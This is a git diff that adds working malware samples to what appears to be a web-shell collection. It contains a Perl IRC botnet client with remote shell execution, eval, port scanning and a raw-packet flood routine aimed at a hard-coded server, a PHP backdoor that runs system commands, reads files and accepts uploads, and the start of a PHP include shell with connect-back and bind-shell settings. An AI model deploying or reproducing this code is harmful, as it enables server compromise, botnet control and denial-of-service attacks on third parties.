--- /dev/null
+++ b/138shell/P/perlbot.pl.txt
@@ -0,0 +1,687 @@
+#!/usr/bin/perl
+# ========================= 
+# Perl Bot by LKY 
+# Obrigado a italo, false e Ragde :D
+# ========================= 
+
+# Componentes
+use IO::Socket;
+use Socket;
+use IO::Select;
+
+# Configura??es
+my $servidor        ='208.98.16.20';
+my $porta           ='9002';
+my $nick            =DDos;
+my $ircname         = 'DDos';
+my $realname        = "DDos";
+my @canais=("#SSH");
+my @adms=("Kelserific","Puna","nod32");
+#my $processo = '/bin/bash';    #se comantar nao mostra o PID
+
+#Flood Control
+my $linas_max=6;
+my $sleep=3;
+
+#Acesso a Shel - 1 ON 0 OFF
+my $secv = 1;
+
+##############################
+my $VERSAO = '0.1';
+
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+
+chdir("/tmp/");
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Problema com o fork: $!" unless defined($pid);
+
+#diretorio,config do server e pid
+
+chdir("/");
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Problema com o fork: $!" unless defined($pid);
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+
+#######
+#Bot em si!
+#######
+
+$sel_cliente = new IO::Select();
+sub sendraw {
+  if ($#_ == '1') {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+  } else {
+      print $IRC_cur_socket "$_[0]\n";
+  }
+}
+
+sub conectar {
+   my $meunick = $_[0];
+   my $servidor_con = $_[1];
+   my $porta_con = $_[2];
+
+   my $IRC_socket = new IO::Socket::INET(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
+   if (defined($IRC_socket)) {
+     $IRC_cur_socket = $IRC_socket;
+
+     $IRC_socket->autoflush(1);
+     $sel_cliente->add($IRC_socket);
+
+     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+     nick("$meunick");
+     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+     sleep 1;
+   }
+
+}
+my $line_temp;
+while( 1 ) {
+   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+   delete($irc_servers{''}) if (defined($irc_servers{''}));
+   &DCC::connections;
+   my @ready = $sel_cliente->can_read(0);
+   next unless(@ready);
+   foreach $fh (@ready) {
+     $IRC_cur_socket = $fh;
+     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+     $nread = sysread($fh, $msg, 4096);
+     if ($nread == 0) {
+        $sel_cliente->remove($fh);
+        $fh->close;
+        delete($irc_servers{$fh});
+     }
+     @lines = split (/\n/, $msg);
+
+     for(my $c=0; $c<= $#lines; $c++) {
+       $line = $lines[$c];
+       $line=$line_temp.$line if ($line_temp);
+       $line_temp='';
+       $line =~ s/\r$//;
+       unless ($c == $#lines) {
+         parse("$line");
+       } else {
+           if ($#lines == 0) {
+             parse("$line");
+           } elsif ($lines[$c] =~ /\r$/) {
+               parse("$line");
+           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+               parse("$line");
+           } else {
+               $line_temp = $line;
+           }
+       }
+      }
+   }
+}
+
+
+ 
+sub parse {
+   my $servarg = shift;
+   if ($servarg =~ /^PING \:(.*)/) {
+     sendraw("PONG :$1");
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+       my $pn=$1; my $onde = $4; my $args = $5;
+       if ($args =~ /^\001VERSION\001$/) {
+         notice("$pn", "\001VERSION LKY bot-$VERSAO\001");
+       }
+       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
+         if ($onde eq "$meunick"){
+           shell("$pn", "$args");
+         }
+         if ($args =~ /^(\Q$meunick\E|\!hdr)\s+(.*)/ ) {
+            my $natrix = $1;
+            my $arg = $2;
+            if ($arg =~ /^\!(.*)/) {
+              ircase("$pn","$onde","$1") unless ($natrix eq "!hdr" and $arg =~ /^\!nick/);
+            } elsif ($arg =~ /^\@(.*)/) {
+                $ondep = $onde;
+                $ondep = $pn if $onde eq $meunick;
+                bfunc("$ondep","$1");
+            } else {
+                shell("$onde", "$arg");
+            }
+         } 
+       }
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+       if (lc($1) eq lc($meunick)) {
+         $meunick=$4; 
+         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       }
+   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+       nick("$meunick".int rand(9999));
+   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+       $meunick = $2;
+       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+       foreach my $canal (@canais) {
+         sendraw("JOIN $canal");
+       }
+   }
+}
+
+sub bfunc {
+  my $printl = $_[0];
+  my $funcarg = $_[1];
+  if (my $pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           if ($funcarg =~ /^portscan (.*)/) {
+             my $hostip="$1";
+             my @portas=("21","22","23","25","53","80","110","143","6667","59","7000","110","65535","0");
+             my (@aberta, %porta_banner);
+             foreach my $porta (@portas)  {
+                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
+                if ($scansock) {
+                   push (@aberta, $porta);
+                   $scansock->close;
+                }
+             }
+
+             if (@aberta) {
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
+             } else {
+                 sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada"); 
+             }
+           }
+           if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
+             my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
+             $dtime = 1 if $dtime == 0;
+             my %bytes;
+             $bytes{igmp} = $2 * $pacotes{igmp};
+             $bytes{icmp} = $2 * $pacotes{icmp};
+             $bytes{o} = $2 * $pacotes{o};
+             $bytes{udp} = $2 * $pacotes{udp};
+             $bytes{tcp} = $2 * $pacotes{tcp};
+            
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :4STATUS - LKY");
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :14Tempo:1 $dtime"."s");
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :14Total pacotes:1 ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} +  $pacotes{o}));
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :14Total bytes:1 ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :14M?dia de envio:4 ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
+
+
+           }
+           exit;
+       }
+  }
+}
+ 
+sub ircase {
+  my ($kem, $printl, $case) = @_;
+
+  if ($case =~ /^join (.*)/) {
+     j("$1");
+   } 
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+   if ($case =~ /^rejoin\s+(.*)/) {
+      my $chan = $1;
+      if ($chan =~ /^(\d+) (.*)/) {
+        for (my $ca = 1; $ca <= $1; $ca++ ) {
+          p("$2");
+          j("$2");
+        }
+      } else {
+          p("$chan");
+          j("$chan");
+      }
+   }
+   if ($case =~ /^op/) {
+      op("$printl", "$kem") if $case eq "op";
+      my $oarg = substr($case, 3);
+      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^deop/) {
+      deop("$printl", "$kem") if $case eq "deop";
+      my $oarg = substr($case, 5);
+      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^voice/) {
+      voice("$printl", "$kem") if $case eq "voice";
+      $oarg = substr($case, 6);
+      voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^devoice/) {
+      devoice("$printl", "$kem") if $case eq "devoice";
+      $oarg = substr($case, 8);
+      devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^msg\s+(\S+) (.*)/) {
+      msg("$1", "$2");
+   }
+   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        msg("$2", "$3");
+      }
+   }
+   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+      ctcp("$1", "$2");
+   }
+   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        ctcp("$2", "$3");
+      }
+   }
+   if ($case =~ /^invite\s+(\S+) (.*)/) {
+      invite("$1", "$2");
+   }
+   if ($case =~ /^nick (.*)/) {
+      nick("$1");
+   }
+   if ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
+       conectar("$2", "$1", 6667);
+   }
+   if ($case =~ /^send\s+(\S+)\s+(\S+)/) {
+      DCC::SEND("$1", "$2");
+   }
+   if ($case =~ /^raw (.*)/) {
+      sendraw("$1");
+   }
+   if ($case =~ /^eval (.*)/) {
+     eval "$1";
+   }
+}
+sub shell {
+  return unless $secv;
+  my $printl=$_[0];
+  my $comando=$_[1];
+  if ($comando =~ /cd (.*)/) {
+    chdir("$1") || msg("$printl", "Diert?? inexistente!");
+    return;
+  } 
+  elsif ($pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           my @resp=`$comando 2>&1 3>&1`;
+           my $c=0;
+           foreach my $linha (@resp) {
+             $c++;
+             chop $linha;
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+             if ($c == "$linas_max") {
+               $c=0;
+               sleep $sleep;
+             }
+           }
+           exit;
+       }
+  }
+}
+
+#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
+sub attacker {
+  my $iaddr = inet_aton($_[0]);
+  my $msg = 'B' x $_[1];
+  my $ftime = $_[2];
+  my $cp = 0;
+  my (%pacotes);
+  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+  
+  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+  return(undef) if $cp == 4;
+  my $itime = time;
+  my ($cur_time);
+  while ( 1 ) {
+     for (my $porta = 1; $porta <= 65535; $porta++) {
+       $cur_time = time - $itime;
+       last if $cur_time >= $ftime;
+       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+       # DoS ?? :P
+       for (my $pc = 3; $pc <= 255;$pc++) {
+         next if $pc == 6;
+         $cur_time = time - $itime;
+         last if $cur_time >= $ftime;
+         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;;
+       }
+     }
+     last if $cur_time >= $ftime;
+  }
+  return($cur_time, %pacotes);
+}
+
+
+
+#############
+#  ALIASES  #
+#############
+
+sub action {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
+}
+
+sub ctcp {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+sub msg {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :$_[1]");
+}  
+
+sub notice {
+   return unless $#_ == 1;
+   sendraw("NOTICE $_[0] :$_[1]");
+}
+
+sub op {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +o $_[1]");
+}
+sub deop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -o $_[1]");
+}
+sub hop {
+    return unless $#_ == 1;
+   sendraw("MODE $_[0] +h $_[1]");
+}
+sub dehop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +h $_[1]");
+}
+sub voice {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +v $_[1]");
+}
+sub devoice {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -v $_[1]");
+}
+sub ban {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +b $_[1]");
+}
+sub unban {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -b $_[1]");
+}
+sub kick {
+   return unless $#_ == 1;
+   sendraw("KICK $_[0] $_[1] :$_[2]");
+}
+
+sub modo {
+   return unless $#_ == 0;
+   sendraw("MODE $_[0] $_[1]");
+}
+sub mode { modo(@_); }
+
+sub j { &join(@_); }
+sub join {
+   return unless $#_ == 0;
+   sendraw("JOIN $_[0]");
+}
+sub p { part(@_); }
+sub part {sendraw("PART $_[0]");}
+
+sub nick {
+  return unless $#_ == 0;
+  sendraw("NICK $_[0]");
+}
+
+sub invite {
+   return unless $#_ == 1;
+   sendraw("INVITE $_[1] $_[0]");
+}
+sub topico {
+   return unless $#_ == 1;
+   sendraw("TOPIC $_[0] $_[1]");
+}
+sub topic { topico(@_); }
+
+sub whois {
+  return unless $#_ == 0;
+  sendraw("WHOIS $_[0]");
+}
+sub who {
+  return unless $#_ == 0;
+  sendraw("WHO $_[0]");
+}
+sub names {
+  return unless $#_ == 0;
+  sendraw("NAMES $_[0]");
+}
+sub away {
+  sendraw("AWAY $_[0]");
+}
+sub back { away(); }
+sub quit {
+  sendraw("QUIT :$_[0]");
+}
+
+
+
+# DCC
+package DCC;
+
+sub connections {
+   my @ready = $dcc_sel->can_read(1);
+#   return unless (@ready);
+   foreach my $fh (@ready) {
+     my $dcctipo = $DCC{$fh}{tipo};
+     my $arquivo = $DCC{$fh}{arquivo};
+     my $bytes = $DCC{$fh}{bytes};
+     my $cur_byte = $DCC{$fh}{curbyte};
+     my $nick = $DCC{$fh}{nick};
+
+     my $msg;
+     my $nread = sysread($fh, $msg, 10240);
+
+     if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
+        $DCC{$fh}{status} = "Cancelado";
+        $DCC{$fh}{ftime} = time;
+        $dcc_sel->remove($fh);
+        $fh->close;
+        next;
+     }
+
+     if ($dcctipo eq "get") {
+        $DCC{$fh}{curbyte} += length($msg);
+
+        my $cur_byte = $DCC{$fh}{curbyte};
+
+        open(FILE, ">> $arquivo");
+        print FILE "$msg" if ($cur_byte <= $bytes);
+        close(FILE);
+
+        my $packbyte = pack("N", $cur_byte);
+        print $fh "$packbyte";
+
+        if ($bytes == $cur_byte) {
+           $dcc_sel->remove($fh);
+           $fh->close;
+           $DCC{$fh}{status} = "Recebido";
+           $DCC{$fh}{ftime} = time;
+           next;
+        }
+     } elsif ($dcctipo eq "send") {
+          my $send = $fh->accept;
+          $send->autoflush(1);
+          $dcc_sel->add($send);
+          $dcc_sel->remove($fh);
+          $DCC{$send}{tipo} = 'sendcon';
+          $DCC{$send}{itime} = time;
+          $DCC{$send}{nick} = $nick;
+          $DCC{$send}{bytes} = $bytes;
+          $DCC{$send}{curbyte} = 0;
+          $DCC{$send}{arquivo} = $arquivo;
+          $DCC{$send}{ip} = $send->peerhost;
+          $DCC{$send}{porta} = $send->peerport;
+          $DCC{$send}{status} = "Enviando";
+
+          #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
+          open(FILE, "< $arquivo");
+          my $fbytes;
+          read(FILE, $fbytes, 1024);
+          print $send "$fbytes";
+          close FILE;
+#          delete($DCC{$fh});
+     } elsif ($dcctipo eq 'sendcon') {
+          my $bytes_sended = unpack("N", $msg);
+          $DCC{$fh}{curbyte} = $bytes_sended;
+          if ($bytes_sended == $bytes) {
+             $fh->close;
+             $dcc_sel->remove($fh);
+             $DCC{$fh}{status} = "Enviado";
+             $DCC{$fh}{ftime} = time;
+             next;
+          }
+          open(SENDFILE, "< $arquivo");
+          seek(SENDFILE, $bytes_sended, 0);
+          my $send_bytes;
+          read(SENDFILE, $send_bytes, 1024);
+          print $fh "$send_bytes";
+          close(SENDFILE);
+     }
+   }
+}
+
+
+sub SEND {
+  my ($nick, $arquivo) = @_;
+  unless (-r "$arquivo") {
+    return(0);
+  }
+ 
+  my $dccark = $arquivo;
+  $dccark =~ s/[.*\/](\S+)/$1/;
+
+  my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
+  my $longip = unpack("N",inet_aton($meuip));
+
+  my @filestat = stat($arquivo);
+  my $size_total=$filestat[7];
+  if ($size_total == 0) {
+     return(0);
+  }
+
+  my ($porta, $sendsock);
+  do {
+    $porta = int rand(64511);
+    $porta += 1024;
+    $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
+  } until $sendsock;
+
+  $DCC{$sendsock}{tipo} = 'send';
+  $DCC{$sendsock}{nick} = $nick;
+  $DCC{$sendsock}{bytes} = $size_total;
+  $DCC{$sendsock}{arquivo} = $arquivo;
+
+
+  &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
+
+}
+
+sub GET {
+  my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
+  return(0) if (-e "$arquivo");
+  if (open(FILE, "> $arquivo")) {
+     close FILE;
+  } else { 
+    return(0); 
+  }
+
+  my $dccip=fixaddr($dcclongip);
+  return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
+  my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
+  $dccsock->autoflush(1);
+  $dcc_sel->add($dccsock);
+  $DCC{$dccsock}{tipo} = 'get';
+  $DCC{$dccsock}{itime} = time;
+  $DCC{$dccsock}{nick} = $nick;
+  $DCC{$dccsock}{bytes} = $bytes;
+  $DCC{$dccsock}{curbyte} = 0;
+  $DCC{$dccsock}{arquivo} = $arquivo;
+  $DCC{$dccsock}{ip} = $dccip;
+  $DCC{$dccsock}{porta} = $dccporta;
+  $DCC{$dccsock}{status} = "Recebendo";
+}
+
+# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
+sub Status {
+  my $socket = shift;
+  my $sock_tipo = $DCC{$socket}{tipo};
+  unless (lc($sock_tipo) eq "chat") {
+    my $nick = $DCC{$socket}{nick};
+    my $arquivo = $DCC{$socket}{arquivo};
+    my $itime = $DCC{$socket}{itime};
+    my $ftime = time;
+    my $status = $DCC{$socket}{status};
+    $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
+
+    my $d_time = $ftime-$itime;
+
+    my $cur_byte = $DCC{$socket}{curbyte};
+    my $bytes_total =  $DCC{$socket}{bytes};
+
+    my $rate = 0;
+    $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
+    my $porcen = ($cur_byte*100)/$bytes_total;
+
+    my ($r_duv, $p_duv);
+    if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
+       $r_duv = $3; $r_duv++ if $4 >= 5;
+       $rate = "$1\.$2"."$r_duv";
+    }
+    if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
+       $p_duv = $3; $p_duv++ if $4 >= 5;
+       $porcen = "$1\.$2"."$p_duv";
+    }
+    return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
+  }
+
+
+  return(0);
+}
+
+
+# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
+sub fixaddr {
+    my ($address) = @_;
+
+    chomp $address;     # just in case, sigh.
+    if ($address =~ /^\d+$/) {
+        return inet_ntoa(pack "N", $address);
+    } elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
+        return $address;
+    } elsif ($address =~ tr/a-zA-Z//) {                    # Whee! Obfuscation!
+        return inet_ntoa(((gethostbyname($address))[4])[0]);
+    } else {
+        return;
+    }
+}
+ 
diff --git a/138shell/P/php-backdoor.txt b/138shell/P/php-backdoor.txt
new file mode 100644
index 0000000..7defd37
--- /dev/null
+++ b/138shell/P/php-backdoor.txt
@@ -0,0 +1,71 @@
+<?
+// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
+
+ob_implicit_flush();
+if(isset($_REQUEST['f'])){
+        $filename=$_REQUEST['f'];
+        $file=fopen("$filename","rb");
+        fpassthru($file);
+        die;
+}
+if(isset($_REQUEST['d'])){
+        $d=$_REQUEST['d'];
+        echo "<pre>";
+        if ($handle = opendir("$d")) {
+        echo "<h2>listing of $d</h2>";
+                   while ($dir = readdir($handle)){ 
+                       if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
+							else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
+                       echo "$dir\n"; 
+                       echo "</font></a>";
+                }
+                       
+        } else echo "opendir() failed";
+        closedir($handle);
+        die ("<hr>"); 
+}
+if(isset($_REQUEST['c'])){
+	echo "<pre>";
+	system($_REQUEST['c']);		   
+	die;
+}
+if(isset($_REQUEST['upload'])){
+
+		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
+			else $dir=$_REQUEST['dir'];
+		$fname=$HTTP_POST_FILES['file_name']['name'];
+		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
+			die('file uploading error.');
+}
+if(isset($_REQUEST['mquery'])){
+	
+	$host=$_REQUEST['host'];
+	$usr=$_REQUEST['usr'];
+	$passwd=$_REQUEST['passwd'];
+	$db=$_REQUEST['db'];
+	$mquery=$_REQUEST['mquery'];
+	mysql_connect("$host", "$usr", "$passwd") or
+    die("Could not connect: " . mysql_error());
+    mysql_select_db("$db");
+    $result = mysql_query("$mquery");
+	if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
+    while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
+    mysql_free_result($result);
+	die;
+}
+?>
+<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form> 
+<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
+upload file:<input name="file_name" type="file">   to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
+<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
+<br>for example:
+http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
+or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
+<hr>execute mysql query:
+<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
+host:<input type="text" name="host"value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
+
+database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
+</form>
+
+<!--	http://michaeldaw.org	2006 	-->
diff --git a/138shell/P/php-include-w-shell.txt b/138shell/P/php-include-w-shell.txt
new file mode 100644
index 0000000..2b4b74a
--- /dev/null
+++ b/138shell/P/php-include-w-shell.txt
@@ -0,0 +1,1312 @@
+<?php
+######################################################################
+# we decide if we want syslogging
+closelog();
+######################################################################
+# define variables
+######################################################################
+
+# error_reporting(E_ALL);
+error_reporting(0);
+
+# get globals even if register_globals is off
+import_globals();
+
+$safe_mode = ini_get('safe_mode');
+$register_globals = ini_get('register_globals');
+$magic_quotes_gpc = ini_get('magic_quotes_gpc');
+$txt['en']['on']="on";
+$txt['en']['off']="off";
+$txt['de']['on']="an";
+$txt['de']['off']="aus";
+$lang="en";
+
+if($safe_mode == 1) $SM = $txt[$lang]['on'];
+else { 
+	$SM = $txt[$lang]['off'];
+	# set_time_limit(9000);
+}
+if($register_globals == 1) $RG = $txt[$lang]['on'];
+else $RG = $txt[$lang]['off'];
+if($magic_quotes_gpc == 1) $MQ = $txt[$lang]['on'];
+else $MQ = $txt[$lang]['off'];
+
+# navigatable functions
+$ArrFuncs = array(
+	"dropinc"	=> 0,
+	"filecopy"	=> 0,
+	"fileedit"	=> 0,
+	"showsource"	=> 0,
+	"snoop"		=> 0,
+	"cmdln"		=> 0,
+	"connectback"	=> 0,
+	"phpshell"	=> 0,
+	"servicecheck"	=> 0,
+	"mysqlaccess"	=> 0,
+	"mail"		=> 0,
+	"env"		=> 0,
+	"phpenv"	=> 0,
+	"phpinfo"	=> 0,
+	"dumpvars"	=> 0,
+	"debugscript"	=> 0,
+	"syslog"	=> 0
+);
+
+# init navigation
+foreach($ArrFuncs as $key => $val) if(!isset($$key)) $$key = $val;
+
+
+
+# set default values
+$ArrDefaults = array(
+	"filecopy_source" => "http://...",
+	"filecopy_dest" => getcwd(),
+	"cmdcall" => "",
+	"editfile" => getcwd(),
+	"editcontent" => "",
+	"chdir" => ".",
+	"vsource" => $SCRIPT_FILENAME,
+	"mail_from" => "attacker@0wned.org",
+	"mail_to" => "",
+	"mail_subject" => "", 
+	"mail_attach_source"  => "http://....",
+	"mail_attach_appear"  => "filename...",
+	"mail_content_type"   => "image/png",
+	"mail_msg" => "",
+	"tcpports" => "21 22 23 25 80 110",
+	"timeout" => 5,
+	"miniinc_loc" => getcwd() . "/miniinc.php",
+	"incdbhost" => "localhost",
+	"cbhost" => $_SERVER['REMOTE_ADDR'],
+	"cbport" => 20202,
+	"cbtempdir" => "/tmp",
+	"cbcompiler" => "gcc",
+	"phpshellapp" => "export TERM=xterm; bash -i",
+	"phpshellhost" => "0.0.0.0",
+	"phpshellport" => "20202"
+);
+
+# init defaults
+foreach($ArrDefaults as $key => $val) if(!isset($$key)) $$key = $val;
+
+# define executable functions
+$Mstr = array(
+	0 => "No execute functions available!",
+	1 => "passthru()",
+	2 => "system()",
+	3 => "backticks",
+	4 => "proc_open()",
+	5 => "exec()"
+);
+
+# clean request to avoid uri monster
+$SREQ = "";
+$reqdat = array();
+$tmpCount=0;
+foreach($REQUESTS as $key => $val){
+	if($tmpCount==0) $reqdat[] = $key."=".$val;
+	else if($val!=0 || $val!="" || $val!="0") $reqdat[] = $key."=".$val;
+	$tmpCount++;
+}
+$SREQ = implode("&", $reqdat);
+$tmpCount=0;
+if($SREQ=="") {
+	$tmp_req = array();
+	$tmp_qry = explode("&", $QUERY_STRING);
+	foreach($tmp_qry as $key => $val) {
+		$tmp_val = explode("=", $val);
+		if($tmpCount==0) $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
+		else if($tmp_val[1]!=0 || $tmp_val[1]!="" || $tmp_val[1]!="0") $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
+		$tmpCount++;
+	}
+	$SREQ = implode("&", $tmp_req);
+}
+
+if(isset($path['docroot'])) $SREQ .= "&path[docroot]=" . $path['docroot'];
+
+# set some defaults to avaoid errors
+$is_file   = array();
+$is_dir    = array();
+$is_w_dir  = array();
+$is_w_file = array();
+$emeth=0;
+if($chdir!="/" && strlen($chdir) < 2) $chdir = getcwd() . "/";
+$chdir = str_replace("//", "/", $chdir);
+if(substr($chdir, -1) != "/") $chdir .= "/";
+##
+# Setup wether to use PHP_SELF or SCRIPT_NAME
+if($PHP_SELF!=$SCRIPT_NAME) $MyLoc = $PHP_SELF;
+else $MyLoc = $SCRIPT_NAME;
+
+# $MyLoc = "http://" . $_SERVER['HTTP_HOST'] . $MyLoc;
+$MyLoc = "http://" . $SERVER_NAME . ":" . $SERVER_PORT . $MyLoc;
+
+# This is a list of internal inc.inc vars that do not get displayed 
+# inside the dumpvars function (poss for a debug func later?)
+$DebugArr = array(
+	'ARHGFDGFGASDFG',
+	'safe_mode',
+	'register_globals',
+	'magic_quotes_gpc',
+	'txt',
+	'lang',
+	'SM',
+	'RG',
+	'MQ',
+	'ArrFuncs',
+	'val',
+	'key',
+	'env',
+	'phpenv',
+	'phpinfo',
+	'debugscript',
+	'filecopy',
+	'fileedit',
+	'showsource',
+	'snoop',
+	'mail',
+	'cmdln',
+	'syslog',
+	'servicecheck',
+	'dropinc',
+	'mysqlaccess',
+	'ArrDefaults',
+	'filecopy_source',
+	'filecopy_dest',
+	'cmdcall',
+	'editfile',
+	'editcontent',
+	'chdir',
+	'vsource',
+	'mail_from',
+	'mail_to',
+	'mail_subject',
+	'mail_attach_source',
+	'mail_attach_appear',
+	'mail_content_type',
+	'mail_msg',
+	'tcpports',
+	'timeout',
+	'miniinc_loc',
+	'incdbhost',
+	'Mstr',
+	'SREQ',
+	'reqdat',
+	'tmpCount',
+	'is_file',
+	'is_dir',
+	'is_w_dir',
+	'is_w_file',
+	'emeth',
+	'MyLoc',
+	'dumpvarsare',
+	'DebugArr',
+	'cbtempdir',
+	'cbcompiler',
+	'cbhost',
+	'cbport',
+	'phpshelltype',
+	'phpshellapp',
